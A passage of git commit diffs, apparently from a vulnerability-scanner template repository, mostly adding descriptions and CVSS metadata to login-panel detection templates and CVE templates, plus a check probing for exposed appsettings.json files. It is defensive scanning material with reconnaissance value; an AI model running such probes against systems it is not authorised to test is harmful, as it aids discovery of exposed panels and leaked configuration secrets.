+58,5 @@ requests: - '
mikrotik routeros (.[0-9.]+) configuration page
' - 'routeros (.[0-9.]+) ' - 'MikroTik RouterOS (.[0-9.]+)' + +# Enhanced by md on 2023/01/03 diff --git a/exposed-panels/ncentral-panel.yaml b/exposed-panels/ncentral-panel.yaml index 3cec954949..9d2680f2b9 100644 --- a/exposed-panels/ncentral-panel.yaml +++ b/exposed-panels/ncentral-panel.yaml @@ -1,9 +1,14 @@ id: ncentral-panel info: - name: N-central Login Panel + name: N-central Login Panel - Detect author: theabhinavgaur severity: info + description: N-central login panel was detected. + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 metadata: verified: true shodan-query: http.title:"N-central Login" @@ -24,3 +29,5 @@ requests: - type: status status: - 200 + +# Enhanced by md on 2023/01/03 diff --git a/exposed-panels/netris-dashboard-panel.yaml b/exposed-panels/netris-dashboard-panel.yaml index 8903b81b62..ec8acaefe6 100644 --- a/exposed-panels/netris-dashboard-panel.yaml +++ b/exposed-panels/netris-dashboard-panel.yaml @@ -1,9 +1,14 @@ id: netris-dashboard-panel info: - name: Netris Dashboard Panel + name: Netris Dashboard Panel - Detect author: theamanrawat severity: info + description: Netris Dashboard panel was detected. + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 metadata: verified: true shodan-query: http.title:"Netris Dashboard" @@ -24,3 +29,5 @@ requests: - type: status status: - 200 + +# Enhanced by md on 2023/01/03 diff --git a/exposed-panels/opencart-panel.yaml b/exposed-panels/opencart-panel.yaml index 2d205ae196..dc115f38c0 100644 --- a/exposed-panels/opencart-panel.yaml +++ b/exposed-panels/opencart-panel.yaml @@ -1,13 +1,17 @@ id: opencart-panel info: - name: OpenCart Login Panel + name: OpenCart Login Panel - Detect author: ricardomaia severity: info description: | - OpenCart is an open-source online store management system. + OpenCart login panel was detected. reference: - https://www.opencart.com + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 metadata: verified: true shodan-query: html:"OpenCart" @@ -28,3 +32,5 @@ requests: - '(?i)footer\s.*OpenCart.*All.Rights.Reserved|img\s.*logo.*\salt=.*OpenCart' - "(?i)Powered.By.*http.*OpenCart" condition: or + +# Enhanced by md on 2023/01/03 diff --git a/exposed-panels/planet-estream-panel.yaml b/exposed-panels/planet-estream-panel.yaml index 77bd110968..4aeb63fa07 100644 --- a/exposed-panels/planet-estream-panel.yaml +++ b/exposed-panels/planet-estream-panel.yaml @@ -1,9 +1,14 @@ id: planet-estream-panel info: - name: Planet eStream Login Panel + name: Planet eStream Login Panel - Detect author: arafatansari severity: info + description: Planet eStream login panel was detected. + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 metadata: verified: true shodan-query: title:"Login - Planet eStream" @@ -28,3 +33,5 @@ requests: - type: status status: - 200 + +# Enhanced by md on 2023/01/03 diff --git a/exposed-panels/posthog-admin-panel.yaml b/exposed-panels/posthog-admin-panel.yaml index fcf9621c71..7110a96f68 100644 --- a/exposed-panels/posthog-admin-panel.yaml +++ b/exposed-panels/posthog-admin-panel.yaml @@ -1,9 +1,14 @@ id: posthog-admin-panel info: - name: Posthog Admin Panel + name: PostHog Login Panel - Detect author: theabhinavgaur severity: info + description: PostHog login panel was detected. + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 metadata: verified: true shodan-query: http.title:"posthog" @@ -27,3 +32,5 @@ requests: - type: status status: - 200 + +# Enhanced by md on 2023/01/03 diff --git a/exposed-panels/retool-login.yaml b/exposed-panels/retool-login.yaml index 8cc9383bca..d2768ddc2d 100644 --- a/exposed-panels/retool-login.yaml +++ b/exposed-panels/retool-login.yaml @@ -1,9 +1,14 @@ id: retool-login info: - name: Retool Login + name: Retool Login Panel - Detect author: DhiyaneshDk severity: info + description: Retool login panel was detected. + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 metadata: verified: true shodan-query: title:"Retool" @@ -23,3 +28,5 @@ requests: - type: status status: - 200 + +# Enhanced by md on 2023/01/03 diff --git a/exposed-panels/riseup-panel.yaml b/exposed-panels/riseup-panel.yaml index 2c50c60ba4..9401447e36 100644 --- a/exposed-panels/riseup-panel.yaml +++ b/exposed-panels/riseup-panel.yaml @@ -1,11 +1,16 @@ id: riseup-panel info: - name: Rise Up Panel + name: Rise Up Login Panel - Detect author: righettod severity: info + description: Rise Up login panel was detected. reference: - https://www.riseup.ai/en/ + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 metadata: verified: true tags: panel,riseup @@ -33,3 +38,5 @@ requests: - type: status status: - 200 + +# Enhanced by md on 2023/01/03 diff --git a/exposed-panels/rocketmq-console-exposure.yaml b/exposed-panels/rocketmq-console-exposure.yaml index daecd5cd44..214273eaf4 100644 --- a/exposed-panels/rocketmq-console-exposure.yaml +++ b/exposed-panels/rocketmq-console-exposure.yaml @@ -1,9 +1,14 @@ id: rocketmq-console-exposure info: - name: Apache RocketMQ Console Exposure + name: Apache RocketMQ Console Panel - Detect author: pdteam severity: info + description: Apache RocketMQ Console panel was detected. + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: panel,apache requests: @@ -15,3 +20,5 @@ requests: - type: word words: - "RocketMq-console-ng" + +# Enhanced by md on 2023/01/03 diff --git a/exposed-panels/room-alert-detect.yaml b/exposed-panels/room-alert-detect.yaml index ff14faeb69..d9c1c5d396 100644 --- a/exposed-panels/room-alert-detect.yaml +++ b/exposed-panels/room-alert-detect.yaml @@ -1,11 +1,16 @@ id: room-alert-detect info: - name: AVTECH Room Alert - Panel Detect + name: AVTECH Room Alert Login Panel - Detect author: gy741 severity: info + description: AVTECH Room Alert login panel was detected. reference: - https://avtech.com/articles/166/how-to-access-a-room-alert-monitors-settings-pages-2/ + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 metadata: verified: true shodan-query: title:"Room Alert" @@ -36,3 +41,5 @@ requests: - type: status status: - 200 + +# Enhanced by md on 2023/01/03 diff --git a/exposed-panels/royalevent-management-panel.yaml b/exposed-panels/royalevent-management-panel.yaml index 4165fbd8cf..4c37684a82 100644 --- a/exposed-panels/royalevent-management-panel.yaml +++ b/exposed-panels/royalevent-management-panel.yaml @@ -1,9 +1,14 @@ id: royalevent-management-panel info: - name: Royal Event Management Admin Panel + name: Royal Event Management System Admin Panel - Detect author: ritikchaddha severity: info + description: Royal Event Management System admin panel was detected. + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 metadata: verified: true tags: royalevent,panel @@ -26,3 +31,5 @@ requests: - type: status status: - 200 + +# Enhanced by md on 2023/01/03 diff --git a/exposed-panels/rsa-self-service.yaml b/exposed-panels/rsa-self-service.yaml index c550c20e0f..03e428df23 100644 --- a/exposed-panels/rsa-self-service.yaml +++ b/exposed-panels/rsa-self-service.yaml @@ -1,9 +1,14 @@ id: rsa-self-service info: - name: Detect RSA Self-Service Panel + name: RSA Self-Service Login Panel - Detect author: PR3R00T severity: info + description: RSA Self-Service login panel was detected. + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: panel,rsa requests: @@ -23,3 +28,5 @@ requests: - type: status status: - 200 + +# Enhanced by md on 2023/01/03 diff --git a/exposed-panels/rstudio-detect.yaml b/exposed-panels/rstudio-detect.yaml index d5e3bef4f2..cee08d8dda 100644 --- a/exposed-panels/rstudio-detect.yaml +++ b/exposed-panels/rstudio-detect.yaml @@ -1,9 +1,14 @@ id: rstudio-detect info: - name: RStudio panel detector + name: RStudio Panel - Detect author: philippedelteil severity: info + description: RStudio panel was detected. + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: panel,rstudio requests: @@ -19,3 +24,5 @@ requests: - type: status status: - 302 + +# Enhanced by md on 2023/01/03 diff --git a/exposed-panels/ruckus-wireless-admin-login.yaml b/exposed-panels/ruckus-wireless-admin-login.yaml index f017b7705f..25062c6d03 100644 --- a/exposed-panels/ruckus-wireless-admin-login.yaml +++ b/exposed-panels/ruckus-wireless-admin-login.yaml @@ -1,25 +1,32 @@ -id: ruckus-wireless-admin-login -info: - name: Ruckus Wireless Admin Login Panel - author: pussycat0x - severity: info - metadata: - verified: true - shodan-query: title:"ruckus" - tags: panel,exposed,ruckus - -requests: - - method: GET - path: - - '{{BaseURL}}/login.asp' - - matchers-condition: and - matchers: - - type: word - part: body - words: - - "Ruckus Wireless Admin" - - - type: status - status: - - 200 +id: ruckus-wireless-admin-login +info: + name: Ruckus Wireless Admin Login Panel - Detect + author: pussycat0x + severity: info + description: Ruckus Wireless admin login panel was detected. + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 + metadata: + verified: true + shodan-query: title:"ruckus" + tags: panel,exposed,ruckus + +requests: + - method: GET + path: + - '{{BaseURL}}/login.asp' + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "Ruckus Wireless Admin" + + - type: status + status: + - 200 + +# Enhanced by md on 2023/01/03 diff --git a/exposed-panels/ruijie/rg-uac-panel.yaml b/exposed-panels/ruijie/rg-uac-panel.yaml index e7a5ecfa7c..12466c700d 100644 --- a/exposed-panels/ruijie/rg-uac-panel.yaml +++ b/exposed-panels/ruijie/rg-uac-panel.yaml @@ -1,9 +1,14 @@ id: rg-uac-panel info: - name: RG-UAC Ruijie Login Panel + name: Ruijie RG-UAC Login Panel - Detect author: princechaddha severity: info + description: Ruijie RG-UAC login panel was detected. + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 metadata: shodan-query: http.html:"Get_Verify_Info" tags: panel,ruijie,router,firewall @@ -25,3 +30,5 @@ requests: - type: status status: - 200 + +# Enhanced by md on 2023/01/03 diff --git a/exposed-panels/rundeck-login.yaml b/exposed-panels/rundeck-login.yaml index 579261dd66..a57a999a2a 100644 --- a/exposed-panels/rundeck-login.yaml +++ b/exposed-panels/rundeck-login.yaml @@ -1,9 +1,14 @@ id: rundeck-login info: - name: RunDeck Login Panel + name: Rundeck Login Panel - Detect author: DhiyaneshDk, daffainfo severity: info + description: Rundeck login panel was detected. + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 metadata: verified: true shodan-query: title:"Rundeck" @@ -37,3 +42,5 @@ requests: - 'utm_medium=([0-9.]+)-' - 'data-version-string=\"([0-9.-]+)\"' ## Detection version on old rundeck - '([0-9.-]+)<\/span>' ## Detection on very old rudneck + +# Enhanced by md on 2023/01/03 diff --git a/exposed-panels/rustici-content-controller.yaml b/exposed-panels/rustici-content-controller.yaml index 5c56e783cb..f9cc8369d2 100644 --- a/exposed-panels/rustici-content-controller.yaml +++ b/exposed-panels/rustici-content-controller.yaml @@ -1,9 +1,14 @@ id: rustici-content-controller info: - name: Rustici Content Controller + name: Rustici Content Controller Panel - Detect author: DhiyaneshDk severity: info + description: Rustici Content Controller panel was detected. + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 metadata: verified: true shodan-query: title:"Rustici Content Controller" @@ -25,3 +30,5 @@ requests: - type: status status: - 200 + +# Enhanced by md on 2023/01/03 diff --git a/exposed-panels/saferoads-vms-login.yaml b/exposed-panels/saferoads-vms-login.yaml index 5520f4ff0c..74e400c33f 100644 --- a/exposed-panels/saferoads-vms-login.yaml +++ b/exposed-panels/saferoads-vms-login.yaml @@ -1,11 +1,16 @@ id: saferoads-vms-login info: - name: Saferoads VMS Login + name: Saferoads VMS Login Panel - Detect author: dhiyaneshDk severity: info + description: Saferoads VMS login panel was detected. reference: - https://www.exploit-db.com/ghdb/6941 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: panel,edb requests: @@ -15,4 +20,6 @@ requests: matchers: - type: word words: - - 'Saferoads VMS' \ No newline at end of file + - 'Saferoads VMS' + +# Enhanced by md on 2023/01/03 diff --git a/exposed-panels/sage-panel.yaml b/exposed-panels/sage-panel.yaml index b23444a452..3a0fd2564f 100644 --- a/exposed-panels/sage-panel.yaml +++ b/exposed-panels/sage-panel.yaml @@ -1,9 +1,14 @@ id: sage-panel info: - name: Sage X3 Login Panel + name: Sage X3 Login Panel - Detect author: pikpikcu,daffainfo severity: info + description: Sage X3 login panel was detected. + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 metadata: shodan-query: http.title:"Sage X3" tags: panel,sage,login @@ -25,3 +30,5 @@ requests: - type: status status: - 200 + +# Enhanced by md on 2023/01/03 diff --git a/exposed-panels/samba-swat-panel.yaml b/exposed-panels/samba-swat-panel.yaml index 339a06409d..7ae8cef25a 100644 --- a/exposed-panels/samba-swat-panel.yaml +++ b/exposed-panels/samba-swat-panel.yaml @@ -1,9 +1,14 @@ id: samba-swat-panel info: - name: Samba SWAT panel + name: Samba SWAT Panel - Detect author: PR3R00T severity: info + description: Samba SWAT panel was detected. + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: panel,samba requests: @@ -16,3 +21,5 @@ requests: words: - 'Basic realm="SWAT"' part: header + +# Enhanced by md on 2023/01/03 diff --git a/exposed-panels/samsung-printer-detect.yaml b/exposed-panels/samsung-printer-detect.yaml index 06bfa4c0f4..5cdb3a2861 100644 --- a/exposed-panels/samsung-printer-detect.yaml +++ b/exposed-panels/samsung-printer-detect.yaml @@ -1,9 +1,14 @@ id: samsung-printer-detect info: - name: SAMSUNG Printer Detection + name: Samsung Printer Panel - Detect author: pussycat0x severity: info + description: Samsung printer panel was detected. + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 metadata: fofa-query: app="SAMSUNG-Printer" tags: iot,panel,samsung,printer @@ -22,3 +27,5 @@ requests: - type: status status: - 200 + +# Enhanced by md on 2023/01/03 diff --git a/exposed-panels/sap-hana-xsengine-panel.yaml b/exposed-panels/sap-hana-xsengine-panel.yaml index fd5d752e43..7b5a60aecd 100644 --- a/exposed-panels/sap-hana-xsengine-panel.yaml +++ b/exposed-panels/sap-hana-xsengine-panel.yaml @@ -1,9 +1,14 @@ id: sap-hana-xsengine-panel info: - name: SAP HANA XSEngine Admin Panel + name: SAP HANA XS Engine Admin Login Panel - Detect author: PR3R00T severity: info + description: SAP HANA XS Engine admin login panel was detected. + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: panel,sap requests: @@ -16,3 +21,5 @@ requests: words: - "/sap/hana/xs/formLogin/images/sap.png" part: body + +# Enhanced by md on 2023/01/03 diff --git a/vulnerabilities/qibocms-file-download.yaml b/vulnerabilities/qibocms-file-download.yaml index 8d26a91827..f9189369a8 100644 --- a/vulnerabilities/qibocms-file-download.yaml +++ b/vulnerabilities/qibocms-file-download.yaml @@ -1,7 +1,7 @@ id: qibocms-file-download info: - name: Qibocms - Arbitary File Download + name: Qibocms - Arbitrary File Download author: theabhinavgaur severity: high metadata: From 7a4029903acd8dbada19e8896d65077240b318a9 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 5 Jan 2023 15:12:31 +0000 Subject: [PATCH 0753/1133] Auto Generated CVE annotations [Thu Jan 5 15:12:31 UTC 2023] :robot: --- cves/2022/CVE-2022-45917.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cves/2022/CVE-2022-45917.yaml b/cves/2022/CVE-2022-45917.yaml index bc6097e4be..19c87ef2df 100644 --- a/cves/2022/CVE-2022-45917.yaml +++ b/cves/2022/CVE-2022-45917.yaml @@ -17,8 +17,8 @@ info: cve-id: CVE-2022-45917 cwe-id: CWE-601 metadata: - shodan-query: http.html:"ILIAS" cve-id: CVE-2022-45917 + shodan-query: http.html:"ILIAS" verified: "true" tags: redirect,packetstorm,seclists,cve,cve2022,ilias From feaa5b948f756743a3e0a09e4a7116f29526ebd3 Mon Sep 17 00:00:00 2001 From: Arman <65326024+tess-ss@users.noreply.github.com> Date: Thu, 5 Jan 2023 11:22:07 -0500 Subject: [PATCH 0754/1133] Update appsettings-file-disclosure.yaml --- exposures/files/appsettings-file-disclosure.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/exposures/files/appsettings-file-disclosure.yaml b/exposures/files/appsettings-file-disclosure.yaml index 7822b8ef58..c63ea1ee9e 100644 --- a/exposures/files/appsettings-file-disclosure.yaml +++ b/exposures/files/appsettings-file-disclosure.yaml @@ -16,6 +16,7 @@ requests: - method: GET path: - "{{BaseURL}}/appsettings.json" + - "{{BaseURL}}/appsettings.Production.json" matchers-condition: and matchers: From dd1c5d227ddda4ca45c35d74dd06b72e2fff7b4e Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Thu, 5 Jan 2023 21:53:37 +0530 Subject: [PATCH 0755/1133] stop-at-first-match --- exposures/files/appsettings-file-disclosure.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/exposures/files/appsettings-file-disclosure.yaml b/exposures/files/appsettings-file-disclosure.yaml index c63ea1ee9e..f6d0a72737 100644 --- a/exposures/files/appsettings-file-disclosure.yaml +++ b/exposures/files/appsettings-file-disclosure.yaml @@ -18,6 +18,7 @@ requests: - "{{BaseURL}}/appsettings.json" - "{{BaseURL}}/appsettings.Production.json" + stop-at-first-match: true matchers-condition: and matchers: - type: word From 249b8d50745a79613dc409e11be2ea1fffe25397 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 5 Jan 2023 16:49:54 +0000 Subject: [PATCH 0757/1133] Auto Generated CVE annotations [Thu Jan 5 16:49:54 UTC 2023] :robot: --- cves/2020/CVE-2020-11110.yaml | 2 +- cves/2020/CVE-2020-35476.yaml | 2 +- cves/2021/CVE-2021-25099.yaml | 7 +++++-- cves/2021/CVE-2021-30128.yaml | 7 ++++++- cves/2021/CVE-2021-41773.yaml | 2 +- cves/2021/CVE-2021-42887.yaml | 2 +- cves/2022/CVE-2022-0786.yaml | 5 ++++- cves/2022/CVE-2022-1595.yaml | 5 ++++- cves/2022/CVE-2022-2314.yaml | 6 ++++-- cves/2022/CVE-2022-23854.yaml | 3 +++ cves/2022/CVE-2022-33891.yaml | 9 ++++++++- cves/2022/CVE-2022-3768.yaml | 4 ++-- cves/2022/CVE-2022-4050.yaml | 7 +++++-- cves/2022/CVE-2022-4260.yaml | 2 +- cves/2022/CVE-2022-42746.yaml | 9 +++++---- cves/2022/CVE-2022-45917.yaml | 9 +++++++-- cves/2022/CVE-2022-46381.yaml | 7 ++++++- exposures/files/svn-wc-db.yaml | 2 +- vulnerabilities/vmware/vmware-nsx-stream-rce.yaml | 2 +- vulnerabilities/zyxel/unauth-lfd-zhttpd.yaml | 2 +- 20 files changed, 67 insertions(+), 27 deletions(-) diff --git a/cves/2020/CVE-2020-11110.yaml b/cves/2020/CVE-2020-11110.yaml index d2971ae099..389723f1bd 100644 --- a/cves/2020/CVE-2020-11110.yaml +++ b/cves/2020/CVE-2020-11110.yaml @@ -19,7 +19,7 @@ info: cwe-id: CWE-79 metadata: shodan-query: title:"Grafana" - tags: cve,cve2020,xss,grafana + tags: cve,cve2020,xss,grafana,hackerone requests: - raw: diff --git a/cves/2020/CVE-2020-35476.yaml b/cves/2020/CVE-2020-35476.yaml index 866fd32df3..7c848935d7 100644 --- a/cves/2020/CVE-2020-35476.yaml +++ b/cves/2020/CVE-2020-35476.yaml @@ -14,7 +14,7 @@ info: cvss-score: 9.8 cve-id: CVE-2020-35476 cwe-id: CWE-78 - tags: cve,cve2020,opentsdb,rce + tags: cve,cve2020,opentsdb,rce,packetstorm requests: - method: GET diff --git a/cves/2021/CVE-2021-25099.yaml b/cves/2021/CVE-2021-25099.yaml index 8759827774..e2bb1db58c 100644 --- a/cves/2021/CVE-2021-25099.yaml +++ b/cves/2021/CVE-2021-25099.yaml @@ -11,10 +11,13 @@ info: - https://wordpress.org/plugins/give/ - https://nvd.nist.gov/vuln/detail/CVE-2021-25099 classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 cve-id: CVE-2021-25099 + cwe-id: CWE-79 metadata: - verified: true - tags: cve,cve2021,wordpress,wp-plugin,wp,xss,give,unauth + verified: "true" + tags: wp-plugin,wp,unauth,cve,cve2021,wordpress,xss,give,wpscan requests: - raw: diff --git a/cves/2021/CVE-2021-30128.yaml b/cves/2021/CVE-2021-30128.yaml index 439728c9a8..c439f7e542 100644 --- a/cves/2021/CVE-2021-30128.yaml +++ b/cves/2021/CVE-2021-30128.yaml @@ -8,11 +8,16 @@ info: reference: - https://lists.apache.org/thread.html/rbe8439b26a71fc3b429aa793c65dcc4a6e349bc7bb5010746a74fa1d@%3Ccommits.ofbiz.apache.org%3E - https://nvd.nist.gov/vuln/detail/CVE-2021-30128 + - https://lists.apache.org/thread.html/rb3f5cd65f3ddce9b9eb4d6ea6e2919933f0f89b15953769d11003743%40%3Cdev.ofbiz.apache.org%3E + - https://lists.apache.org/thread.html/rb3f5cd65f3ddce9b9eb4d6ea6e2919933f0f89b15953769d11003743@%3Cdev.ofbiz.apache.org%3E classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 cve-id: CVE-2021-30128 + cwe-id: CWE-502 metadata: - verified: true fofa-query: app="Apache_OFBiz" + verified: "true" tags: cve,cve2021,apache,ofbiz,deserialization,rce requests: diff --git a/cves/2021/CVE-2021-41773.yaml b/cves/2021/CVE-2021-41773.yaml index ddf881088d..ad139dccdf 100644 --- a/cves/2021/CVE-2021-41773.yaml +++ b/cves/2021/CVE-2021-41773.yaml @@ -19,8 +19,8 @@ info: cve-id: CVE-2021-41773 cwe-id: CWE-22 metadata: - verified: "true" shodan-query: Apache 2.4.49 + verified: "true" tags: cve,cve2021,lfi,rce,apache,misconfig,traversal,kev variables: diff --git a/cves/2021/CVE-2021-42887.yaml b/cves/2021/CVE-2021-42887.yaml index 4e297d02a5..295b7e5b6d 100644 --- a/cves/2021/CVE-2021-42887.yaml +++ b/cves/2021/CVE-2021-42887.yaml @@ -10,7 +10,7 @@ info: - https://nvd.nist.gov/vuln/detail/cve-2021-42887 - https://github.com/p1Kk/vuln/blob/main/totolink_ex1200t_login_bypass.md classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2021-42887 cwe-id: CWE-287 diff --git a/cves/2022/CVE-2022-0786.yaml b/cves/2022/CVE-2022-0786.yaml index 9024b1d7f7..9fd5d7dd3a 100644 --- a/cves/2022/CVE-2022-0786.yaml +++ b/cves/2022/CVE-2022-0786.yaml @@ -11,10 +11,13 @@ info: - https://wordpress.org/plugins/kivicare-clinic-management-system/ - https://nvd.nist.gov/vuln/detail/CVE-2022-0786 classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 cve-id: CVE-2022-0786 + cwe-id: CWE-89 metadata: verified: "true" - tags: cve,cve2022,wordpress,wp-plugin,wp,sqli,kivicare-clinic-management-system,unauth + tags: kivicare-clinic-management-system,unauth,wp,sqli,wordpress,wp-plugin,wpscan,cve,cve2022 requests: - raw: diff --git a/cves/2022/CVE-2022-1595.yaml b/cves/2022/CVE-2022-1595.yaml index 9d5329b78f..17b7899ae2 100644 --- a/cves/2022/CVE-2022-1595.yaml +++ b/cves/2022/CVE-2022-1595.yaml @@ -11,10 +11,13 @@ info: - https://wordpress.org/plugins/hc-custom-wp-admin-url/ - https://nvd.nist.gov/vuln/detail/CVE-2022-1595 classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N + cvss-score: 5.3 cve-id: CVE-2022-1595 + cwe-id: CWE-200 metadata: verified: "true" - tags: cve,cve2022,wordpress,wp-plugin,wp,hc-custom-wp-admin-url,unauth + tags: wpscan,cve,cve2022,wordpress,wp-plugin,wp,hc-custom-wp-admin-url,unauth requests: - raw: diff --git a/cves/2022/CVE-2022-2314.yaml b/cves/2022/CVE-2022-2314.yaml index fac0172cbb..c811ebb651 100644 --- a/cves/2022/CVE-2022-2314.yaml +++ b/cves/2022/CVE-2022-2314.yaml @@ -11,10 +11,12 @@ info: - https://wordpress.org/plugins/vr-calendar-sync/ - https://nvd.nist.gov/vuln/detail/CVE-2022-2314 classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 cve-id: CVE-2022-2314 metadata: - verified: true - tags: cve,cve2022,wordpress,wp-plugin,wp,rce,vr-calendar-sync,unauth + verified: "true" + tags: rce,unauth,wordpress,wp-plugin,wp,vr-calendar-sync,wpscan,cve,cve2022 requests: - raw: diff --git a/cves/2022/CVE-2022-23854.yaml b/cves/2022/CVE-2022-23854.yaml index dd1f30bd82..a959cdbceb 100644 --- a/cves/2022/CVE-2022-23854.yaml +++ b/cves/2022/CVE-2022-23854.yaml @@ -12,7 +12,10 @@ info: - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-23854 - https://www.cisa.gov/uscert/ics/advisories/icsa-22-342-02 classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 cve-id: CVE-2022-23854 + cwe-id: CWE-23 metadata: shodan-query: http.html:"InTouch Access Anywhere" verified: "true" diff --git a/cves/2022/CVE-2022-33891.yaml b/cves/2022/CVE-2022-33891.yaml index ffb2b048f2..709c340a2a 100644 --- a/cves/2022/CVE-2022-33891.yaml +++ b/cves/2022/CVE-2022-33891.yaml @@ -8,9 +8,16 @@ info: reference: - https://github.com/W01fh4cker/cve-2022-33891 - https://nvd.nist.gov/vuln/detail/CVE-2022-33891 + - https://lists.apache.org/thread/p847l3kopoo5bjtmxrcwk21xp6tjxqlc + - http://packetstormsecurity.com/files/168309/Apache-Spark-Unauthenticated-Command-Injection.html + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H + cvss-score: 8.8 + cve-id: CVE-2022-33891 + cwe-id: CWE-77 metadata: - verified: "true" shodan-query: title:"Spark Master at" + verified: "true" tags: cve,cve2022,apache,spark,authenticated variables: diff --git a/cves/2022/CVE-2022-3768.yaml b/cves/2022/CVE-2022-3768.yaml index 6a15ca0e43..43719c9e25 100644 --- a/cves/2022/CVE-2022-3768.yaml +++ b/cves/2022/CVE-2022-3768.yaml @@ -6,12 +6,12 @@ info: severity: high description: | The WPSmartContracts WordPress plugin before 1.3.12 does not properly sanitise and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by users with a role as low as author - remediation: Fixed in version 1.3.12 reference: - https://wpscan.com/vulnerability/1d8bf5bb-5a17-49b7-a5ba-5f2866e1f8a3 - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-3768 - https://nvd.nist.gov/vuln/detail/CVE-2022-3768 - https://cve.report/CVE-2022-3768 + remediation: Fixed in version 1.3.12 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H cvss-score: 8.8 @@ -19,7 +19,7 @@ info: cwe-id: CWE-89 metadata: verified: "true" - tags: cve,cve2022,wordpress,wp-plugin,wp,sqli,wp-smart-contracts,authenticated + tags: wp-plugin,wp,wp-smart-contracts,authenticated,wpscan,cve,cve2022,wordpress,sqli requests: - raw: diff --git a/cves/2022/CVE-2022-4050.yaml b/cves/2022/CVE-2022-4050.yaml index 12ac0b3770..0cf3d27e8c 100644 --- a/cves/2022/CVE-2022-4050.yaml +++ b/cves/2022/CVE-2022-4050.yaml @@ -11,10 +11,13 @@ info: - https://wordpress.org/plugins/joomsport-sports-league-results-management/ - https://nvd.nist.gov/vuln/detail/CVE-2022-4050 classification: + cvss-metrics: 